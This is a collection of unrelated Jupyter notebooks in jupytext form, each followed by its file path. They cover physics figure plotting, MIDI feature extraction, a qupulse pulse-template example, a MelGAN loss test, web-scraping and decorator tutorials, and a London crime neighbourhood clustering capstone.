= 0.746$ and $D/\epsilon_0 = -30\ \mathrm{V/nm}$ at $26\ \mathrm{mK}$. The sample is initially polarized with an out-of-plane field. The sample is then rotated to $-57 \pm 21\ \mathrm{mdeg}$ in zero magnetic field. The field $B_{\parallel}$ is then increased from zero (red trace) before completing a hysteresis loop (blue traces). 
Though the absolute resistance is offset between the two panels, as seen in the vertical axis labels, the size of the resistance range is the same in both panels. # ## S6A # + fig, ax = plt.subplots(figsize = (2*1.618, 2)) fig.patch.set_facecolor('white') plt.plot(np.cos(figs6['thetas'][0])*np.abs(figs6['dn_B'][0]), figs6['dn_rxx'][0], label='Initial sweep up') plt.plot(np.cos(figs6['thetas'][0])*np.abs(figs6['dn_B'][1]), figs6['dn_rxx'][1], color='C0') plt.plot(np.cos(figs6['thetas'][0])*np.abs(figs6['up_B'][0]), figs6['up_rxx'][0], linestyle='--', label='Sweep down') plt.plot(np.cos(figs6['thetas'][0])*np.abs(figs6['dn_B'][2]), figs6['dn_rxx'][2], color='C1', label='Sweep up') plt.plot(np.cos(figs6['thetas'][0])*np.abs(figs6['dn_B'][3]), figs6['dn_rxx'][3], color='C1') plt.xlim(6,14) plt.ylim(7.75, 10.75) plt.xlabel(r'$| B_{\mathrm{||}}| \ (\mathrm{T})$') plt.ylabel(r'$R_{xx}\ (\mathrm{k\Omega})$') plt.legend(fontsize=7, frameon=False,loc='upper right') plt.savefig('figures/figs6a.pdf', bbox_inches='tight', transparent=True) # - # ## S6B # + fig, ax = plt.subplots(figsize = (2*1.618, 2)) fig.patch.set_facecolor('white') plt.plot(np.cos(figs6['thetas'][0])*np.abs(figs6['dn_B'][0]), figs6['dn_ryx'][0], label='Initial sweep up') plt.plot(np.cos(figs6['thetas'][0])*np.abs(figs6['dn_B'][1]), figs6['dn_ryx'][1], color='C0') plt.plot(np.cos(figs6['thetas'][0])*np.abs(figs6['up_B'][0]), figs6['up_ryx'][0], linestyle='--', label='Sweep down') plt.plot(np.cos(figs6['thetas'][0])*np.abs(figs6['dn_B'][2]), figs6['dn_ryx'][2], color='C1', label='Sweep up') plt.plot(np.cos(figs6['thetas'][0])*np.abs(figs6['dn_B'][3]), figs6['dn_ryx'][3], color='C1') plt.xlim(6,14) plt.ylim(-0.25, 2.75) plt.xlabel(r'$|B_{||}|\ (\mathrm{T})$') plt.ylabel(r'$R_{yx}\ (\mathrm{k\Omega})$') plt.savefig('figures/figs6b.pdf', bbox_inches='tight', transparent=True) # - # # Figure S7 # **Hysteresis loops at small angles.** # # Magnetic field hysteresis loops where $R_{yx}$ is measured at two small 
angles of very different magnitude and likely opposite sign: $+172 \pm 29\ \mathrm{mdeg}$ in red and $-17 \pm 22\ \mathrm{mdeg}$ in blue. Both traces were taken at $28\ \mathrm{mK}$ with $n/n_s = 0.746$ and $D/\epsilon_0 = -30\ \mathrm{V/nm}$. The sample has been rotated in the plane by an angle of $20^\circ$ relative to the measurements performed in Fig. 2 of the main text. # + fig, ax = plt.subplots(figsize=(4*1.618, 4)) fig.patch.set_facecolor('white') ind = 0 plt.plot(figs7['dn_B'][ind], figs7['dn_ryx'][ind], color='C0', label=figs7['labels'][ind]) plt.plot(figs7['up_B'][ind], figs7['up_ryx'][ind], color='C0', linestyle='--') ind = 1 plt.plot(figs7['dn_B'][ind], figs7['dn_ryx'][ind], color='C1', label=figs7['labels'][ind]) plt.plot(figs7['up_B'][ind], figs7['up_ryx'][ind], color='C1', linestyle='--') plt.xlim(-7,7) plt.ylim(-9,9) plt.xlabel(r'$B\ (\mathrm{T})$') plt.ylabel(r'$R_{yx}\ (\mathrm{k\Omega})$') ind = 0 ax.text(0.60, 0.915, figs7['labels'][ind], transform=ax.transAxes, fontsize=10, va='top', ha='left', color='C0') ind = 1 ax.text(0.60, 0.815, figs7['labels'][ind], transform=ax.transAxes, fontsize=10, va='top', ha='left', color='C1') plt.savefig('figures/figs7.pdf', bbox_inches='tight', transparent=True) # - # # Figure S8 # **In-plane field dependence of longitudinal resistance.** # # Longitudinal resistance $R_{xx}$ as a function of carrier density $n$ for several different in-plane magnetic fields at a fixed displacement field of $D/\epsilon_0 = -0.30\ \mathrm{V/nm}$ and $1.2\ \mathrm{K}$ for a tilt angle of $-62 \pm 23\ \mathrm{mdeg}$. 
# + fig, ax = plt.subplots(figsize = (4*1.618,4)) fig.patch.set_facecolor('white') col = plt.get_cmap('inferno') for i, _ in enumerate(figs8['labels']): fig = plt.semilogy(figs8['nu'][i], figs8['rxx'][i], color=col(i/len(figs8['labels']))) ax.text(0.25, 0.425 + 0.075*i, figs8['labels'][i], transform=ax.transAxes, fontsize=10, va='top', ha='left', color=col(i/len(figs8['labels']))) plt.xlabel(r'$n/\,n_s$') plt.ylabel(r'$R_{xx}\ (\mathrm{\Omega})$') plt.xlim(-1.4,1.4) plt.ylim(300,400000) plt.savefig('figures/figs8.pdf', bbox_inches='tight', transparent=True) # -
evidence of orbital ferromagnetism in twisted bilayer graphene aligned to hexagonal boron nitride/tbg_rot_figures.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: DeepLearning
#     language: python
#     name: deeplearning
# ---

# Music processing
from music21 import *
# Algorithms
from itertools import takewhile
# File management
import os
from glob import glob
from pathlib import Path
import csv

# ## Settings

# Set the path to the training file directory
corpus_path = 'C:\\Users\\alext\\Desktop\\School\\2021 Spring\\CS 271\\Final Project\\Feature Extraction\\Music Corpus'

# Set the path to store the extracted features
export_path = 'C:\\Users\\alext\\Desktop\\School\\2021 Spring\\CS 271\\Final Project\\Feature Extraction\\Music Features'

# ## Convert Music Files Into Features

def extract_features(path, file_name):
    """Parse one music file and return its notes as a list of MIDI-pitch lists.

    Parameters:
        path: directory containing the music file.
        file_name: name of the file (.mxl/.mid/.midi) to parse.

    Returns:
        A list with one entry per note/chord in score order; each entry is a
        list of MIDI pitch numbers (length 1 for a single note).
    """
    # Construct the full path of the music file
    file_path = os.path.join(path, file_name)

    # Parse the file and convert it into a music21 stream object
    score_stream = converter.parse(file_path)

    # Flatten the score to get every note and chord in playback order
    note_stream = score_stream.flat.notes

    # An ordered list of the notes in the song
    features = []

    # Iterate the stream directly (the old takewhile(lambda x: True, ...)
    # wrapper was an identity pass-through and added nothing).
    for phrase in note_stream:
        if type(phrase) is note.Note:
            # A single note: one-element pitch list
            features.append([phrase.pitch.midi])
        elif type(phrase) is chord.Chord:
            # A chord: record every constituent pitch
            features.append([p.midi for p in phrase.pitches])

    return features

# ## Export a List of Features to a CSV File

def export_features(path, file_name, features):
    """Write the extracted feature rows to ``<path>/<file_name stem>.csv``.

    Parameters:
        path: directory in which to store the CSV file.
        file_name: name of the source music file; its extension is replaced
            with ``.csv``.
        features: list of per-note MIDI pitch lists from extract_features().
    """
    # Replace the extension. BUG FIX: the old slice-based rename
    # (file_name[:-3] + 'csv') assumed a 3-character extension and turned
    # 'song.midi' into 'song.mcsv'; Path.with_suffix handles any extension.
    file_name = str(Path(file_name).with_suffix('.csv'))

    # Construct the full path of the target feature file
    file_path = os.path.join(path, file_name)

    # BUG FIX: open with newline='' as required by the csv module; without
    # it every row is followed by a blank line on Windows.
    with open(file_path, 'w', newline='') as feature_file:
        csv.writer(feature_file).writerows(features)

# ## Extract Features from all Training 
Files # + # Go to the training file directory os.chdir(corpus_path) # Get a list of all mxl files in the directory music_files = glob('*.mxl') + glob('*.mid') + glob('*.midi') print("Extraxting...") # Extract the features for each score for file_name in music_files: features = extract_features(corpus_path, file_name) export_features(export_path, file_name, features) print("Finished")
Tests/Music Note Extraction Test.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Abstract Pulse Template # This pulse template can be used as a place holder for a pulse template with a defined interface. Pulse template properties like `defined_channels` can be passed on initialization to declare those properties who make up the interface. Omitted properties raise an `NotSpecifiedError` exception if accessed. Properties which have been accessed are marked as "frozen". # The abstract pulse template can be linked to another pulse template by calling the `link_to` member. The target has to have the same properties for all properties marked as "frozen". This ensures a property always returns the same value. # + from qupulse.pulses import AbstractPT, FunctionPT, AtomicMultiChannelPT, PointPT init = PointPT([(0, (1, 0)), ('t_init', (0, 1), 'linear')], ['X', 'Y']) abstract_readout = AbstractPT('readout', defined_channels={'X', 'Y'}, integral={'X': 1, 'Y': 'a*b'}) manip = AtomicMultiChannelPT(FunctionPT('sin(t)', 't_manip', channel='X'), FunctionPT('cos(t)', 't_manip', channel='Y')) experiment = init @ manip @ abstract_readout # - # We can access declared properties like integral. If we try to get a non-declared property an exception is raised. # + print('The integral has been declared so we can get it') print(experiment.integral) print() import traceback try: experiment.duration except Exception as err: print('We get an error that for the pulse "readout" the property "duration" was not specified:') print(repr(err)) # - # We can link the abstract pulse template to an actual pulse template. By accessing the integral property above we froze it. Linking a pulse with a different property will result in an error. 
# + my_readout_wrong_integral = AtomicMultiChannelPT(FunctionPT('1', 't_read', channel='X'), FunctionPT('a*b', 't_read', channel='Y')) my_readout = AtomicMultiChannelPT(FunctionPT('1 / t_read', 't_read', channel='X'), FunctionPT('a*b / t_read', 't_read', channel='Y')) try: print('With wrong integral value:') abstract_readout.link_to(my_readout_wrong_integral) except Exception as err: print(repr(err)) abstract_readout.link_to(my_readout) print('the linking worked. The new experiment has now a defined duration of', repr(experiment.duration), '.')
doc/source/examples/12AbstractPulseTemplate.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# Smoke test for the universal MelGAN generator/discriminator graphs:
# builds the TF1 graph, wires up the adversarial / feature-matching /
# discriminator losses, runs the generator once, and checkpoints.

# +
import os

# Pin the job to GPU 1.
os.environ['CUDA_VISIBLE_DEVICES'] = '1'

# +
import sys

# Make the repository root importable (two levels above this notebook).
SOURCE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__name__)))
sys.path.insert(0, SOURCE_DIR)
# -

import tensorflow as tf
import malaya_speech
import malaya_speech.train
from malaya_speech.train.model import universal_melgan as melgan
import malaya_speech.config
import numpy as np

# Build generator and multi-scale discriminator from the packaged config.
melgan_config = malaya_speech.config.universal_melgan_config
generator = melgan.Generator(
    melgan.GeneratorConfig(**melgan_config['melgan_generator_params']),
    name='universalmelgan-generator',
)
discriminator = melgan.MultiScaleDiscriminator(
    melgan.WaveFormDiscriminatorConfig(**melgan_config['melgan_waveform_discriminator_params']),
    melgan.STFTDiscriminatorConfig(**melgan_config['melgan_stft_discriminator_params']),
    name='universalmelgan-discriminator',
)

# Placeholders: y is a batch of waveforms, x is a batch of 80-bin mel
# spectrogram frames.
y = tf.placeholder(tf.float32, (None, None))
x = tf.placeholder(tf.float32, (None, None, 80))

# y_hat: generated waveform; p_hat / p: discriminator outputs for generated
# and real audio. Based on the indexing below, each p[i] appears to be a list
# of per-layer feature maps with the final element p[i][-1] acting as the
# discriminator score -- TODO confirm against MultiScaleDiscriminator.
y_hat = generator(x)
p_hat = discriminator(y_hat)
p = discriminator(tf.expand_dims(y, -1))

from malaya_speech.train.loss import calculate_2d_loss, calculate_3d_loss

mse_loss = tf.keras.losses.MeanSquaredError()
mae_loss = tf.keras.losses.MeanAbsoluteError()

# +
# Generator adversarial loss: each sub-discriminator's score for generated
# audio is pushed towards 1, then averaged over sub-discriminators.
adv_loss = 0.0
for i in range(len(p_hat)):
    adv_loss += mse_loss(tf.ones_like(p_hat[i][-1]), p_hat[i][-1])
adv_loss /= i + 1

# Feature-matching loss: L1 between real and generated intermediate feature
# maps (all but the final score element).
fm_loss = 0.0
for i in range(len(p_hat)):
    for j in range(len(p_hat[i]) - 1):
        fm_loss += mae_loss(p[i][j], p_hat[i][j])
# NOTE(review): normalizes by (i + 1) * (j + 1) using the loop variables'
# final values -- this is only an exact mean if every sub-discriminator has
# the same number of feature maps; confirm this is intended.
fm_loss /= (i + 1) * (j + 1)
adv_loss += 10 * fm_loss

# +
# Discriminator loss: real scores towards 1, generated scores towards 0,
# averaged over sub-discriminators.
real_loss = 0.0
fake_loss = 0.0
for i in range(len(p)):
    real_loss += mse_loss(tf.ones_like(p[i][-1]), p[i][-1])
    fake_loss += mse_loss(tf.zeros_like(p_hat[i][-1]), p_hat[i][-1])
real_loss /= i + 1
fake_loss /= i + 1
dis_loss = real_loss + fake_loss
# -

adv_loss, dis_loss

sess = tf.InteractiveSession()
sess.run(tf.global_variables_initializer())

# +
# adv_loss_, dis_loss_ = sess.run([adv_loss, dis_loss],
#                                 feed_dict = {x: np.random.uniform(size=(1,200,80)),
#                                              y: np.random.uniform(size=(1,51200))})
# +
# y_hat_, loss, p_, p_hat_ = sess.run([y_hat, p_hat, p],
#                                     feed_dict = {x: np.random.uniform(size=(1,200,80)),
#                                                  y: np.random.uniform(size=(1,51200))})
# -

# Forward pass of the generator only, to check the output waveform shape.
sess.run(y_hat, feed_dict={x: np.random.uniform(size=(1, 200, 80))}).shape

# Checkpoint the freshly initialized variables, then clean up.
saver = tf.train.Saver()
saver.save(sess, 'test/model.ckpt')

# !rm -rf test
test/test-universal-melgan.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # ## Scraping basics # # There are a few steps you'll follow pretty much every time you write a new web scraper: # # 1. Inspect the underlying HTML on the page you want to scrape. Use "View Source" in your browser, or right-click and "Inspect Element" to take a look at how the HTML tags are structured around the data you want to capture. # 2. In the programming language of your choice (we're using Python here), write a script that: # * Opens that page from the internet # * Parses its HTML, using the tags you spotted earlier as a guide # * Saves that data for later # 3. Test your scraper, fix what's broken, and run it again till it works. # # Feels like a pretty straightforward process, but the code underneath the pages where your data lives are often _anything_ but straightforward. So let's start by stepping through the process with a super simple example. # # [This page just has one table on it](pages/scraper-0-page-example-table.html), holding some recent data about NICAR conference locations. Try "View Source" and take a look at the code underneath. A `<table>` tag, some `<tr>` table rows inside of it, and some `<td>` table cells inside those rows. Just what we like to see. # # So let's get that data out of there! In the script we'll build below, our `#` code comments will guide us through each piece of code to write. The first thing we need to do in our Python script is import the libraries we'll be using here: `BeautifulSoup` for parsing HTML and `csv` to write our data to a file. # import the Python libraries we need from bs4 import BeautifulSoup import csv # Now we need to load our page and parse it. Our local copy of the HTML makes that easy, and we'll use `BeautifulSoup` to turn it into a Python object we can work with. 
# +
# Use Python's open() to read the HTML page we've stored locally.
# A `with` block guarantees the file handle is closed even if parsing
# fails (the original opened and closed the file by hand).
with open('pages/scraper-0-page-example-table.html', 'r', encoding='utf-8') as page:
    # use BeautifulSoup to parse that page into Python
    soup = BeautifulSoup(page, 'html.parser')
# -

# We know we want to make ourselves a CSV later on, so we'll need an empty Python list to start stuffing each row of data into. And we can use `BeautifulSoup` again to find just the part of our page we care about: the `<table>`.

# +
# make ourselves an empty list to hold data for a CSV
list_of_rows = []

# use BeautifulSoup to find the table in our parsed HTML
table = soup.find('table')
# -

# And now we're ready to start extracting data! We need a Python loop that:
#
# * goes through each `<tr>` in our `<table>`
# * creates a new, temporary list to hold the cell data it contains
# * loops through each `<td>` in that row, adding its text to our temporary list
# * and once we've processed the full row, append it all to our master list of row data.
#
# Then our loop will move on to the next row, and repeat.

# loop through the rows in our table using BeautifulSoup
for row in table.find_all('tr'):
    # create an empty list each time through, to hold cell data
    list_of_cells = []
    # loop through each cell in this table row
    for cell in row.find_all('td'):
        # grab the text from that cell, stripped of surrounding whitespace
        text = cell.text.strip()
        # and append it to our list
        list_of_cells.append(text)
    # when we're done with this table row, append its data to our list of rows
    list_of_rows.append(list_of_cells)

# With our data successfully extracted and stored in a nice, big list of lists, we can use Python's built-in `csv` library to write ourselves a CSV to analyze later.

# Use Python's CSV library to create our output file.
# newline='' is required so csv.writer doesn't emit blank rows on Windows,
# and the `with` block closes the file for us.
with open('nicar_cities.csv', 'w', newline='', encoding='utf-8') as outfile:
    writer = csv.writer(outfile)
    writer.writerows(list_of_rows)

# And there we have it, we scraped!
#
# Our [next exercise](scraper-1.ipynb) adds just a bit of complexity.
We'll scrape a page with more than just a `<table>` on it, and we'll pull it straight off the internet (wifi willing).
completed_code/scraper-0.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 (ipykernel) # language: python # name: python3 # --- # # Viper Data Process Diagram # # The following Process Diagram shows how the different Viper nodes communicate with one another. The green lines indicate processes where an image is being shared between two nodes, whereas an orange line shows where data is being communicated in the form of messages ranging from simple Bool to arrays of matrices. # # **Fig. 1 Viper Process Diagram** # # # ![](viper_data_process.png) # #
docs/process_diagram.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- s = 'Global Variable' def check_for_locals(): print(locals()) print(globals().keys()) print(globals()['s']) check_for_locals() def hello(name='Jose'): return 'Hello ' + name hello() greet = hello greet hello greet() def hello(name='Jose'): print('The hello() function has been executed') def greet(): return '\t this is inside the greet() function' def welcome(): return '\t this is inside the welcome() function' print(greet()) print(welcome()) print("Now we are back inside the hello() function") hello() welcome() def hello(name='Jose'): print('The hello() function has been executed') def greet(): return '\t this is inside the greet() function' def welcome(): return '\t this is inside the welcome() function' if name == 'Jose': return greet else: return welcome x = hello() x x = hello(name='bskim') x print(x()) x = hello()() x print(x) x = hello x print(x()) x=hello(name = 'Jose') x # + def hello(): return 'Hi Jose!' def other(func): print('Other code would go heare') print(func()) # - other(hello) # + def new_decorator(func): def wrap_func(): print('Code would be heare, before executing the func') func() print('code heare will be execute after the func()') return wrap_func def func_needs_decorator(): print('This function is in need of a Decorator') # - func_needs_decorator() func_needs_decorator = new_decorator(func_needs_decorator) func_needs_decorator() @new_decorator def func_needs_decorator(): print('This function is in need of a Decorator') func_needs_decorator()
python/function_decorator.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + [markdown] id="view-in-github" colab_type="text" # <a href="https://colab.research.google.com/github/venqics/Coursera_capstone/blob/master/Capstone_Project_The_Battle_of_the_Neighborhoods_London_Neighborhood_Clustering.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a> # + [markdown] id="Z2Hq8VXfFD0z" colab_type="text" # ## Capstone Project - The Battle of the Neighborhoods # ### Applied Data Science Capstone by IBM/Coursera # + [markdown] id="TIkN8iUsFD06" colab_type="text" # ## Table of contents # * [Introduction: Business Problem](#introduction) # * [Data](#data) # * [Methodology](#methodology) # * [Analysis](#analysis) # * [Results and Discussion](#results) # * [Conclusion](#conclusion) # + [markdown] id="Bm8dyqm8FD08" colab_type="text" # ## Introduction: Business Problem <a name="introduction"></a> # + [markdown] id="dIJQm2HXFD09" colab_type="text" # # This project aims to select the safest borough in London based on the **total crimes**, explore the **neighborhoods** of that borough to find the **10 most common venues** in each neighborhood and finally cluster the neighborhoods using **k-mean clustering**. # # This report will be targeted to people who are looking to **relocate to London**. Inorder to finalise a neighborhood to hunt for an apartment, **safety** is considered as a top concern when moving to a new place. If you don’t feel safe in your own home, you’re not going to be able to enjoy living there. The **crime statistics** will provide an insight into this issue. # # We will focus on the safest borough and explore its neighborhoods and the 10 most common venues in each neighborhood so that the best neighborhood suited to an individual's needs can be selected. 
# + [markdown] id="dDLHoD51FD0-" colab_type="text" # ## Data <a name="data"></a> # # Based on definition of our problem, factors that will influence our decision are: # * The total number of crimes commited in each of the borough during the last year. # * The most common venues in each of the neighborhood in the safest borough selected. # # Following data sources will be needed to extract/generate the required information: # # - [**Part 1**: Preprocessing a real world data set from Kaggle showing the London Crimes from 2008 to 2016](#part1): A dataset consisting of the crime statistics of each borough in London obtained from Kaggle # - [**Part 2**: Scraping additional information of the different Boroughs in London from a Wikipedia page.](#part2): More information regarding the boroughs of London is scraped using the Beautifulsoup library # - [**Part 3**: Creating a new dataset of the Neighborhoods of the safest borough in London and generating their co-ordinates.](#part3): Co-ordinate of neighborhood will be obtained using **Google Maps API geocoding** # # + [markdown] id="TDJ_ijV-FD1A" colab_type="text" # ### Part 1: Preprocessing a real world data set from Kaggle showing the London Crimes from 2008 to 2016<a name="part1"></a> # # # #### London Crime Data # # About this file # # - lsoa_code: code for Lower Super Output Area in Greater London. # - borough: Common name for London borough. # - major_category: High level categorization of crime # - minor_category: Low level categorization of crime within major category. 
# - value: monthly reported count of categorical crime in given borough # - year: Year of reported counts, 2008-2016 # - month: Month of reported counts, 1-12 # # Data set URL: https://www.kaggle.com/jboysen/london-crime # # + [markdown] id="uXtrWkTWFD1B" colab_type="text" # #### Import necessary libraries # + id="zCcWPnIcFD1D" colab_type="code" colab={} outputId="4c101e88-519a-4ea3-9da8-aa039cdf2755" import requests # library to handle requests import pandas as pd # library for data analsysis import numpy as np # library to handle data in a vectorized manner import random # library for random number generation from bs4 import BeautifulSoup # library for web scrapping # #!conda install -c conda-forge geocoder --yes import geocoder # #!conda install -c conda-forge geopy --yes from geopy.geocoders import Nominatim # module to convert an address into latitude and longitude values # libraries for displaying images from IPython.display import Image from IPython.core.display import HTML # tranforming json file into a pandas dataframe library from pandas.io.json import json_normalize # #!conda install -c conda-forge folium=0.5.0 --yes import folium # plotting library print('Folium installed') print('Libraries imported.') # + id="lAtTxTqbGTSQ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 120} outputId="b466bdbc-440f-4381-d5d0-943f4596d7f2" from google.colab import drive drive.mount('/content/drive') # + [markdown] id="9QYwQ8YXFD1L" colab_type="text" # #### Define Foursquare Credentials and Version # Make sure that you have created a Foursquare developer account and have your credentials handy # + id="7aoIhZliFD1R" colab_type="code" colab={} CLIENT_ID = 'NOML2AGEMHEJH2ARDFOPXFK1J5DI00055VWDGW0DZIDHUZEV' # your Foursquare ID CLIENT_SECRET = '<KEY>' # your Foursquare Secret VERSION = '20180604' LIMIT = 30 # + [markdown] id="nISj48utFD1X" colab_type="text" # #### Read in the dataset # + id="-bfFnDdvFD1Y" colab_type="code" colab={} # Read in the 
data df = pd.read_csv("london_crime_by_lsoa.csv") # + id="k4W5BXlXFD1c" colab_type="code" colab={} outputId="5e63430d-02c5-49bf-ebcb-5fc1f77dc7f6" # View the top rows of the dataset df.head() # + [markdown] id="i6UuRmVgFD1i" colab_type="text" # #### Accessing the most recent crime rates (2016) # + id="04h4uqiKFD1j" colab_type="code" colab={} # Taking only the most recent year (2016) and dropping the rest df.drop(df.index[df['year'] != 2016], inplace = True) # Removing all the entires where crime values are null df = df[df.value != 0] # Reset the index and dropping the previous index df = df.reset_index(drop=True) # + id="Kp45fvWuFD1p" colab_type="code" colab={} outputId="21fc028f-b3c2-4540-d380-2afe755a0f8f" # Shape of the data frame df.shape # + id="v6BjuBD2FD1t" colab_type="code" colab={} outputId="2a67e2a9-dc37-4d2a-c586-ebde062b7f49" # View the top of the dataset df.head() # + [markdown] id="MG63_E6qFD1y" colab_type="text" # #### Change the column names # + id="M6SuO190FD10" colab_type="code" colab={} outputId="26b81878-64af-4b77-eb71-020d75be54d4" df.columns = ['LSOA_Code', 'Borough','Major_Category','Minor_Category','No_of_Crimes','Year','Month'] df.head() # + id="juZUxsvzFD1_" colab_type="code" colab={} outputId="9ee69653-74ab-4021-a45d-9cb85e22e091" # View the information of the dataset df.info() # + [markdown] id="H3HOmk_pFD2D" colab_type="text" # #### Total number of crimes in each Borough # + id="aLbn9CWVFD2F" colab_type="code" colab={} outputId="989896e3-a16f-48e3-b020-df742dc24d52" df['Borough'].value_counts() # + [markdown] id="iQdvjVapFD2K" colab_type="text" # #### The total crimes per major category # + id="kVp4dyMWFD2L" colab_type="code" colab={} outputId="d51d48b7-3b5d-41fd-db72-b0240b698d0a" df['Major_Category'].value_counts() # + [markdown] id="0s7n8aNWFD2P" colab_type="text" # #### Pivoting the table to view the no. 
of crimes for each major category in each Borough # + id="0CqqVF2ZFD2R" colab_type="code" colab={} outputId="22ad197c-8fcf-484e-c372-0f289418437a" London_crime = pd.pivot_table(df,values=['No_of_Crimes'], index=['Borough'], columns=['Major_Category'], aggfunc=np.sum,fill_value=0) London_crime.head() # + id="MlRbiR9MFD2X" colab_type="code" colab={} # Reset the index London_crime.reset_index(inplace = True) # + id="WXQChI5eFD2g" colab_type="code" colab={} outputId="31d26231-be68-4e05-a700-c5c9ca581cea" # Total crimes per Borough London_crime['Total'] = London_crime.sum(axis=1) London_crime.head(33) # + [markdown] id="g0HdlhfbFD2k" colab_type="text" # #### Removing the multi index so that it will be easier to merge # + id="AX8aHkuhFD2m" colab_type="code" colab={} outputId="641e3bb0-5a79-4f83-851e-cfc199a386ab" London_crime.columns = London_crime.columns.map(''.join) London_crime.head() # + [markdown] id="mrY02uU3FD2q" colab_type="text" # #### Renaming the columns # + id="AtAvgai-FD2s" colab_type="code" colab={} outputId="a56241a4-8b55-4178-f809-3e78c599ada9" London_crime.columns = ['Borough','Burglary', 'Criminal Damage','Drugs','Other Notifiable Offences', 'Robbery','Theft and Handling','Violence Against the Person','Total'] London_crime.head() # + id="oHzo0d10FD2y" colab_type="code" colab={} outputId="6c26bdfe-f761-4c69-af0e-31dc75c6fe23" # Shape of the data set London_crime.shape # + id="dqdtJf2DFD22" colab_type="code" colab={} # View the Columns in the data frame # London_crime.columns.tolist() # + [markdown] id="aeEC38FyFD26" colab_type="text" # ### Part 2: Scraping additional information of the different Boroughs in London from a Wikipedia page <a name="part2"></a> # # **Using Beautiful soup to scrap the latitude and longitiude of the boroughs in London** # # URL: https://en.wikipedia.org/wiki/List_of_London_boroughs # + id="uO459kW6FD28" colab_type="code" colab={} outputId="aaf0b9b7-25c6-4275-bd11-ce1379b32615" # getting data from internet 
wikipedia_link='https://en.wikipedia.org/wiki/List_of_London_boroughs' raw_wikipedia_page= requests.get(wikipedia_link).text # using beautiful soup to parse the HTML/XML codes. soup = BeautifulSoup(raw_wikipedia_page,'xml') print(soup.prettify()) # + id="oqjEgiZfFD3A" colab_type="code" colab={} outputId="d1f53467-eb4f-449b-862f-0583343c30b7" # extracting the raw table inside that webpage table = soup.find_all('table', {'class':'wikitable sortable'}) print(table) # + [markdown] id="EmxF9c1NFD3E" colab_type="text" # #### Converting the table into a data frame # + id="Vr11e4rQFD3G" colab_type="code" colab={} outputId="6505e1cb-4784-4252-e93f-f0a5d2d65874" London_table = pd.read_html(str(table[0]), index_col=None, header=0)[0] London_table.head() # + [markdown] id="i4Ef4PE2FD3J" colab_type="text" # #### The second table on the site contains the addition Borough i.e. City of London # + id="UQP59FNDFD3L" colab_type="code" colab={} outputId="65defc73-9d85-4bfc-c486-01303171a939" # Read in the second table London_table1 = pd.read_html(str(table[1]), index_col=None, header=0)[0] # Rename the columns to match the previous table to append the tables. London_table1.columns = ['Borough','Inner','Status','Local authority','Political control', 'Headquarters','Area (sq mi)','Population (2013 est)[1]','Co-ordinates','Nr. in map'] # View the table London_table1 # + [markdown] id="T4AJguSEFD3O" colab_type="text" # #### Append the data frame together # + id="dcieT3mhFD3P" colab_type="code" colab={} outputId="21fff418-3d9f-4af0-9416-517cda4b6dbb" # A continuous index value will be maintained # across the rows in the new appended data frame. 
London_table = London_table.append(London_table1, ignore_index = True) London_table.head() # + [markdown] id="264iYMlhFD3Y" colab_type="text" # #### Check if the last row was appended correctly # + id="QzEnhsOuFD3Z" colab_type="code" colab={} outputId="089ce9f3-0665-434c-83cc-3ce2316fb2ae" London_table.tail() # + [markdown] id="1PxJ92_TFD3f" colab_type="text" # #### View the information of the data set # + id="ij58sdmaFD3g" colab_type="code" colab={} outputId="8092ba90-09f7-493c-8ef1-915cbcbf7dff" London_table.info() # + [markdown] id="EKRQECS8FD3m" colab_type="text" # #### Removing Unnecessary string in the Data set # + id="xVnANGlOFD3o" colab_type="code" colab={} outputId="eedd15ef-5590-43b4-d23f-54ae71727781" London_table = London_table.replace('note 1','', regex=True) London_table = London_table.replace('note 2','', regex=True) London_table = London_table.replace('note 3','', regex=True) London_table = London_table.replace('note 4','', regex=True) London_table = London_table.replace('note 5','', regex=True) # View the top of the data set London_table.head() # + [markdown] id="tX1n2ZlfFD3w" colab_type="text" # #### Check the type of the newly created table # + id="E-K0YHADFD31" colab_type="code" colab={} outputId="3a56f4cc-5838-4649-b863-2f853b404b1e" type(London_table) # + id="gAVQ15CNFD36" colab_type="code" colab={} outputId="96cf6c5e-8ec0-4c8d-db0f-3a5147b5f507" # Shape of the data frame London_table.shape # + [markdown] id="fXcNBEyXFD4B" colab_type="text" # #### Check if the Borough in both the data frames match. 
